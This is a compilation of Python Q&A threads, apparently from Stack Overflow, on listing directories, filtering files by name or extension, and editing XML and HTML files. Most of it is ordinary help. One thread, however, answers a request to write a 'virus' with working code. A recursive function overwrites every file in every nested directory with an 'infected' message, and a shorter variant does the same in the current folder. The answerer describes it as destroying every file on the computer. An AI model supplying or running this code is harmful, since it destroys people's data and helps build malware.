get files from a directory that starts with specific characters - python

I have this path: c:\testfolder\myfolder\
Inside this folder I have these folders:
gr432d4dr
fr34q2sf4fd
grdddxwes
pl34scc
us4352fc
us4245
gr00mis
us994k
These folders contain cpp files inside.
What I want is to search ONLY the folders that start with gr or us.
Here is my code, which tries to search the specific folders:
def search():
    for filename in Path('c:\testfolder\myfolder\').glob('**/*.cpp') :
        with open(filename) as f:
            if "gr" or "us" in f:
                #do something
I added a print to check, but it seems it is still checking all the folders.

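f is not the filename; it is the file object, which gives you access to the file's content. You must check the filename before opening the file.
import os
from pathlib import Path
def search():
    for filename in Path(r'c:\testfolder\myfolder').glob('**/*.cpp'):
        if "gr" in os.fspath(filename) or "us" in os.fspath(filename):
            with open(filename) as f:
                pass  # do something
You need os.fspath to get a string back from a Path object so that the in operator can search it for a substring. Note that this matches gr or us anywhere in the path, not only at the start of a folder name.
Also note the if condition I've edited: "gr" or "us" in f is evaluated as "gr" or ("us" in f), and because the non-empty string "gr" is always truthy, the original test passed for every file. Each substring needs its own in test. I also dropped the trailing backslash from the path, because a raw string literal cannot end in a single backslash.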
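If the goal is strictly "folders whose names start with gr or us", a prefix test on the folder name is tighter than a substring test on the whole path. The following is only a sketch under that assumption; the function name find_cpp_in_prefixed_folders and its parameters are made up for illustration, and it only looks at the top-level folders directly inside the base path.

```python
from pathlib import Path


def find_cpp_in_prefixed_folders(base, prefixes=("gr", "us")):
    """Yield .cpp files below top-level folders of `base` whose names start with a prefix."""
    base = Path(base)
    # str.startswith accepts a tuple of candidate prefixes
    prefixes = tuple(prefixes)
    for folder in sorted(base.iterdir()):
        if folder.is_dir() and folder.name.startswith(prefixes):
            # rglob searches the matching folder recursively
            yield from sorted(folder.rglob("*.cpp"))
```

Calling list(find_cpp_in_prefixed_folders(r'c:\testfolder\myfolder')) would then skip folders such as pl34scc and fr34q2sf4fd entirely instead of opening their files.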

Related

In Python, how do I create a list of files based on specified file extensions?

Let's say I have a folder with a bunch of files (with different file extensions). I want to create a list of files from this folder. However, I want to create a list of files with SPECIFIC file extensions.
These file extensions are categorized into groups.
File Extensions: .jpg, .png, .gif, .pdf, .raw, .docx, .pptx, .xlsx, .js, .html, .css
Group "image" contains .jpg, .png, .gif.
Group "adobe" contains .pdf, .raw. (yes, I'm listing '.raw' as an adobe file for this example :P)
Group "microsoft" contains .docx, .pptx, .xlsx.
Group "webdev" contains .js, .html, .css.
I want to be able to add these files types to a list. That list will be generated in a ".txt" file and would contain ALL files with the chosen file extensions.
So if my folder has 5 image files, 10 adobe files, 5 microsoft files, 3 webdev files and I select the "image" and "microsoft" groups, this application in Python would create a .txt file that contains a list of filenames with file extensions that belong only in the image and microsoft groups.
The text file would have a list like below:
picture1.jpg
picture2.png
picture3.gif
picture4.jpg
picture5.jpg
powerpoint.pptx
powerpoint2.pptx
spreadsheet.xlsx
worddocument.docx
worddocument2.docx
As of right now, my code creates a text file that generates a list of ALL files in a specified folder.
I could use an "if" statement to get specific file extension, but I don't think this achieves the results I want. In this case, I would have to create a function for each Group (i.e. function for the image, adobe, microsoft and webdev groups). I want to be able to combine these groups freely (i.e. image and microsoft files in a list).
Example of an "if" statement:
for elem in os.listdir(filepath):
    if elem.endswith('.jpg'):
        listItem = elem + '\n'
        listName = filepath + (r"\{}List.txt".format(name))
        writeFile = open(listName, 'a')
        writeFile.write(listItem)
        writeFile.close()
    if elem.endswith('.png'):
        listItem = elem + '\n'
        listName = filepath + (r"\{}List.txt".format(name))
        writeFile = open(listName, 'a')
        writeFile.write(listItem)
        writeFile.close()
    if elem.endswith('.gif'):
        listItem = elem + '\n'
        listName = filepath + (r"\{}List.txt".format(name))
        writeFile = open(listName, 'a')
        writeFile.write(listItem)
        writeFile.close()
    else:
        continue
Full code without the "if" statement (generates a .txt file with all filenames from a specified folder):
import os
def enterFilePath():
    global filepath
    filepath = input("Please enter your file path. ")
    os.chdir(filepath)
enterFilePath()
def enterFileName():
    global name
    global listName
    name = str(input("Name the txt file. "))
    listName = name + ".txt"
enterFileName()
def listGenerator():
    for filename in os.listdir(filepath):
        listItem = filename + ' \n'
        listName = filepath + (r"\{}List.txt".format(name))
        writeFile = open(listName, 'a')
        writeFile.write(listItem)
        writeFile.close()
listGenerator()
A pointer before getting into the answer - avoid using global in favor of function parameters and return values. It will make debugging significantly less of a headache and make it easier to follow data flow through your program.
nostradamus is correct in his comment: a dict is the ideal way to solve your problem here. I've solved similar problems before using itertools.chain.from_iterable and pathlib.Path, which I'll use here.
First, the dict:
groups = {
    'image': {'jpg', 'png', 'gif'},
    'adobe': {'pdf', 'raw'},
    'microsoft': {'docx', 'pptx', 'xlsx'},
    'webdev': {'js', 'html', 'css'}
}
This sets up your extension groups that you mentioned, which you can then access easily with groups['image'], groups['adobe'], etc.
Then, using the Path.glob method, itertools.chain.from_iterable, and a comprehension, you can get your list of desired files in a single statement (or function).
from itertools import chain
from pathlib import Path
# Set up some variables
target_groups = ['adobe', 'webdev']
# Initialize generator
files = chain.from_iterable(
    # Glob pattern for the current extension
    Path(filepath).glob(f'*.{ext}')
    # Each group in target_groups
    for group in target_groups
    # Each extension in current group
    for ext in groups[group]
)
# Then, just iterate the files
for fpath in files:
    # Do stuff with file here
    print(fpath.name)
My test directory has one file of each extension you listed, named a, b, etc for each group. Using the above code, my output is:
a.pdf
b.raw
a.js
b.html
c.css
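The way the file generator is set up means that files come out grouped by extension group, in the order given in target_groups, and then by extension. Because each group is a set, the order of extensions within a group is not guaranteed, and glob does not promise alphabetical order within an extension, so wrap the result in sorted() if you need a fixed order. If you want to change which groups are listed, just add or remove values in the target_groups list above (a single group works as well).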
You'll also want to consider parameterizing your targets, such as through input or script arguments, as well as handling cases where a requested group doesn't exist in the groups dictionary. The code above would probably also be more useful as a function, but I'll leave that implementation up to you :)
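As a rough sketch of the function form mentioned above, the following version takes the folder and groups as parameters, rejects unknown groups, and writes the result to a text file. The names GROUPS, list_files and write_list are my own choices for illustration, and matching on Path.suffix instead of one glob per extension is a swapped-in technique so that the output can be sorted by name in one place.

```python
from itertools import chain
from pathlib import Path

GROUPS = {
    "image": {"jpg", "png", "gif"},
    "adobe": {"pdf", "raw"},
    "microsoft": {"docx", "pptx", "xlsx"},
    "webdev": {"js", "html", "css"},
}


def list_files(folder, target_groups, groups=GROUPS):
    """Return sorted names of files in `folder` whose extension is in the chosen groups."""
    unknown = [g for g in target_groups if g not in groups]
    if unknown:
        raise KeyError(f"unknown group(s): {unknown}")
    # Merge the extension sets of all requested groups
    wanted = set(chain.from_iterable(groups[g] for g in target_groups))
    return sorted(
        p.name
        for p in Path(folder).iterdir()
        if p.is_file() and p.suffix.lstrip(".").lower() in wanted
    )


def write_list(folder, target_groups, out_name):
    """Write one matching file name per line to `out_name` inside `folder`."""
    names = list_files(folder, target_groups)
    Path(folder, out_name).write_text("".join(n + "\n" for n in names))
    return names
```

For example, write_list(filepath, ['image', 'microsoft'], 'myList.txt') would produce a list like the one in the question, without a separate function per group.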

Check if any part of string is contained within Text File

Here is my code:
for r, d, f in os.walk(path):
    for folder in d:
        folders.append(os.path.join(r, folder))
for f in folders:
    with open('search.txt') as file:
        contents = file.read()
    if f in contents:
        print ('word found')
I'm having the script search through a given directory and compare the path names to a text file full of virus definitions. I'm trying to get the script to recognise whether the name of a file is contained within that text file.
The problem, as you can see from the code, is that it only works with a complete match, and because it takes the whole path as the string (for example, "C:/test/virus.bat"), it will never match.
Is it possible to adjust this code so that any part of the path can be matched against the text file?
Not sure if that makes sense, any suggestions welcome or please say if not clear.
EDIT:
To be more clear, here is a logic version of what I am trying to achieve:
List all Files in Directory
Get file name within path name ("virus" within "C:/test/virus")
Check if file name is contained within Text File
You can use the following to get all files in a given path:
files = []
for r, d, f in os.walk(path):
    # f already lists the files directly inside r, so join r with each file name
    for file in f:
        files.append(os.path.join(r, file).replace('\\', '/'))
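Then slightly modify your code to achieve the result. You want to check whether the content of the text file is in the given file path, not vice versa -> if content in f. Note that this compares the whole content of search.txt, so it fits a file that holds a single search term; strip the surrounding whitespace so that a trailing newline does not prevent the match:
with open('search.txt', 'r') as file:
    content = file.read().strip()
for f in files:
    if content in f:
        print('Found')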
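The three steps listed in the question's EDIT (list files, take the file name out of the path, look it up in the text file) could also be sketched as below. This assumes the definitions file holds one name per line and that matching should ignore case and file extension; the function names load_definitions and find_matches are hypothetical.

```python
import os


def load_definitions(definitions_path):
    """Read one definition per line (an assumption) into a lowercase set."""
    with open(definitions_path) as fh:
        return {line.strip().lower() for line in fh if line.strip()}


def find_matches(start_dir, definitions):
    """Return paths whose file name, without extension, is a known definition."""
    matches = []
    for root, _dirs, files in os.walk(start_dir):
        for name in files:
            # "virus.bat" -> "virus"
            stem = os.path.splitext(name)[0].lower()
            if stem in definitions:
                matches.append(os.path.join(root, name).replace("\\", "/"))
    return matches
```

Reading the definitions once into a set avoids reopening search.txt for every file and makes each lookup a constant-time membership test.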

Searching a folder structure and modifying XML files using Python

I am trying to create a python script that will iterate through a folder structure, find folders named 'bravo', and modify the xml files contained within them.
In the xml files, I want to modify the 'location' attribute of a tag, called 'file'. Such as:
<file location="e:\one\two"/>
I just need to change the drive letter of the file path from ‘e’ to ‘f’. So that it will read:
<file location="f:\one\two"/>
However...
The names of these xml files are unique, so I cannot search for an exact xml file name. Instead I am searching by the xml file type.
Also, there are other xml files in my folder structure, without the ‘file’ tag reference, that I wish to ignore.
The only constant is that the xml files I want to modify are all stored in folders named, ‘bravo’.
I also wish to create a log file that lists all the xml files and their filepaths which have successfully been updated (and preferably the ones that failed).
Using answers to similar questions on this site, I have cobbled together the following script.
In its current state, the script tries to modify every xml file it finds. I have not been able to successfully add code that only searches folders called 'bravo'.
When the script modifies an xml file, not in a 'bravo' folder, it errors because these files do not contain a 'file' tag.
Please could someone help me to correct my script (or create a new one).
Here is an example of the folder structure...
My folder structure
And my script so far...
from xml.dom import minidom
import os
# enter the directory where to start search for xml files...
for root, dirs, files in os.walk("c:/temp"):
    for file in files:
        #search for xml files...
        if file.endswith(".xml"):
            xml_file = file
            xmldoc = minidom.parse(os.path.join(root, xml_file))
            # in the xml file look for tag called "file"...
            file_location = xmldoc.getElementsByTagName("file")
            # i don't understand the next line of code, but it's needed
            file_location = file_location[0]
            # 'location_string' is a variable for the 'location' path of the file tag in the xml document
            location_string = (file_location.attributes["location"].value)
            # the new drive letter is added to the location_string to create 'new_location'
            new_location = "f" + location_string[1:]
            # replace the 'location' value of the file tag with the new location...
            file_location.attributes["location"].value = new_location
            # write the change to the original file
            with open((os.path.join(root, xml_file)),'w') as f:
                f.write(xmldoc.toxml())
            print("%s has been updated!" % (os.path.join(root, xml_file)))
            # add updated file name to log...
            log_file = open("filepath_update_log.txt", "a")
            log_file.write("%s\n" % (os.path.join(root, xml_file)))
            log_file.close()
Test whether the directory name matches before your second loop. You have to get the last directory in the path first, as in: How to get only the last part of a path in Python?
if os.path.basename(os.path.normpath(root)) == "bravo":
You could use the logging module (https://docs.python.org/3/library/logging.html) for the log file.
If you only want to replace a single letter, then maybe you can replace it directly in the text instead of parsing the xml, as suggested in: https://stackoverflow.com/a/17548459/7062162
def inplace_change(filename, old_string, new_string):
    # Safely read the input filename using 'with'
    with open(filename) as f:
        s = f.read()
        if old_string not in s:
            print('"{old_string}" not found in {filename}.'.format(**locals()))
            return
    # Safely write the changed content, if found in the file
    with open(filename, 'w') as f:
        print('Changing "{old_string}" to "{new_string}" in {filename}'.format(**locals()))
        s = s.replace(old_string, new_string)
        f.write(s)
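Putting the folder-name test and the logging suggestion together with the question's minidom approach might look roughly like this. It is a sketch, not a drop-in replacement: the function name update_bravo_xml, its parameters, and the choice to return two lists are assumptions for illustration, and it treats a 'bravo' xml file without a 'file' tag as a failure.

```python
import logging
import os
from xml.dom import minidom

log = logging.getLogger(__name__)


def update_bravo_xml(start_dir, new_drive="f"):
    """Change the drive letter of <file location="..."> in xml files inside 'bravo' folders."""
    updated, failed = [], []
    for root, _dirs, files in os.walk(start_dir):
        # Skip every folder whose own name is not 'bravo'
        if os.path.basename(os.path.normpath(root)) != "bravo":
            continue
        for name in files:
            if not name.endswith(".xml"):
                continue
            xml_path = os.path.join(root, name)
            try:
                doc = minidom.parse(xml_path)
                tags = [t for t in doc.getElementsByTagName("file")
                        if t.hasAttribute("location")]
                if not tags:
                    raise ValueError("no <file> tag with a location attribute")
                for tag in tags:
                    location = tag.getAttribute("location")
                    # Keep everything after the first character (the old drive letter)
                    tag.setAttribute("location", new_drive + location[1:])
                with open(xml_path, "w") as f:
                    f.write(doc.toxml())
                updated.append(xml_path)
                log.info("updated %s", xml_path)
            except Exception as exc:
                failed.append(xml_path)
                log.error("failed %s: %s", xml_path, exc)
    return updated, failed
```

Calling logging.basicConfig(filename="filepath_update_log.txt", level=logging.INFO) before update_bravo_xml("c:/temp") would send both the successes and the failures to the log file.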

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
    print(item) # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How to confirm only html files exist in a given folder and if not then how to prompt the user to specify a folder with only html files within

I would like to create a python script that will do 3 things:
1) Take user input to navigate to a file directory
2) Confirm the file contents (a particular set of files need to be in the folder for the script to proceed)
3) Do a Find and Replace
The Code as of now:
import os, time
from os.path import walk
mydictionary = {"</i>":"</em>"}
for (path, dirs, files) in os.walk(raw_input('Copy and Paste Course Directory Here: ')):
    for f in files:
        if f.endswith('.html'):
            filepath = os.path.join(path,f)
            s = open(filepath).read()
            for k, v in mydictionary.iteritems():  # terms for a dictionary file and replace
                s = s.replace(k, v)
            f = open(filepath, 'w')
            f.write(s)
            f.close()
Now I have parts 1 and 3; I just need part 2.
For part 2, I need to confirm that only html files exist in the directory the user specifies; otherwise the script should prompt the user to enter the correct folder directory (which will contain html files).
Thanks
From what I understand, here's your pseudocode:
Ask user for directory
If all files in that directory are .html files:
    Do the search-and-replace stuff on the files
Else:
    Warn and repeat from start
I don't think you actually want a recursive walk here, so first I'll write that with a flat listing:
while True:
    dir = raw_input('Copy and Paste Course Directory Here: ')
    files = os.listdir(dir)
    if all(file.endswith('.html') for file in files):
        # do the search and replace stuff
        break
    else:
        print 'Sorry, there are non-HTML files here. Try again.'
Except for having to translate the "repeat from start" into a while True loop with a break, this is almost a word-for-word translation of the English pseudocode.
If you do need the recursive walk through subdirectories, you probably don't want to write the all as a one-liner. It's not that hard to write "all members of the third member of any member of the os.walk result end with '.html'", but it will be hard to read. But if you turn that English description into something more understandable, you should be able to see how to turn it directly into code.
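One possible reading of the recursive case, written for Python 3 (input and print() instead of raw_input and the print statement), is sketched below. The helper names only_html and prompt_for_html_dir are made up for illustration, and the ask parameter exists only so the prompt can be replaced in tests.

```python
import os


def only_html(directory):
    """Return True if every file under `directory`, at any depth, ends with .html."""
    return all(
        name.endswith(".html")
        # The third member of each os.walk result is the list of file names
        for _root, _dirs, files in os.walk(directory)
        for name in files
    )


def prompt_for_html_dir(ask=input):
    """Keep asking until the user names an existing folder that holds only .html files."""
    while True:
        directory = ask("Copy and Paste Course Directory Here: ")
        if os.path.isdir(directory) and only_html(directory):
            return directory
        print("Sorry, that folder is missing or contains non-HTML files. Try again.")
```

Splitting the check into a named function keeps the generator expression readable. Note that an empty folder passes the check, because all() of an empty sequence is True.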
